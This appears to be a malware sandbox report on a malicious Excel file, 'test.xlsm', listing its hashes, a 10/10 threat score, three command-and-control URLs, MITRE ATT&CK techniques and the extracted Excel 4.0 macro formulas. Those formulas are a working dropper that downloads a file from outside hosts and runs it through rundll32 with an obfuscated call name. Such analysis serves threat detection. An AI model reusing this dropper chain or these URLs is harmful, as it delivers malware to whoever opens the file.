Overview

overview

10

Static

static

10

test.xlsm

windows7-x64

10

test.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    test.xlsm

  • Size

    83KB

  • Sample

    230327-tvjt1agd2s

  • MD5

    8fbf9860fb4875112772af77f004da67

  • SHA1

    fd4b875e7c386e3321a623a3bf8e2d0c13d79d8a

  • SHA256

    66676f6cb631e7ff6a516495a780afcf23189458176b5ec68addb9f1395289e6

  • SHA512

    f7a5dfc21723b55440b8f4f310e954bb6d4088314838cb75e5f9c54dbb10d7f5f251aeb742717cde1d12ad922b9e9bb37e7145145e05bc53f1ef5c8c20e1c4f2

  • SSDEEP

    1536:Xycd7LWsqxG/+CbEcWeu3XDXeoiHwt/uE1d7mT6SrPag3HtQVASgVU:ii32G/+CbE9H78wt2E1d7e6STa6Sx

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://zml.laneso.com/packet/AlvJ8OdtSYEeeCQP/

http://ostadsarma.com/wp-admin/JNgASjNC/

http://govtjobresultbd.xyz/sjjz/UIUhOHsLqjOy9/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://zml.laneso.com/packet/AlvJ8OdtSYEeeCQP/","..\erum.ocx",0,0) =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ostadsarma.com/wp-admin/JNgASjNC/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://govtjobresultbd.xyz/sjjz/UIUhOHsLqjOy9/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://zml.laneso.com/packet/AlvJ8OdtSYEeeCQP/
xlm40.dropper

http://ostadsarma.com/wp-admin/JNgASjNC/
xlm40.dropper

http://govtjobresultbd.xyz/sjjz/UIUhOHsLqjOy9/

Targets

    • Target

      test.xlsm

    • Size

      83KB

    • MD5

      8fbf9860fb4875112772af77f004da67

    • SHA1

      fd4b875e7c386e3321a623a3bf8e2d0c13d79d8a

    • SHA256

      66676f6cb631e7ff6a516495a780afcf23189458176b5ec68addb9f1395289e6

    • SHA512

      f7a5dfc21723b55440b8f4f310e954bb6d4088314838cb75e5f9c54dbb10d7f5f251aeb742717cde1d12ad922b9e9bb37e7145145e05bc53f1ef5c8c20e1c4f2

    • SSDEEP

      1536:Xycd7LWsqxG/+CbEcWeu3XDXeoiHwt/uE1d7mT6SrPag3HtQVASgVU:ii32G/+CbE9H78wt2E1d7e6STa6Sx

    Score
    10/10
    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

3
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks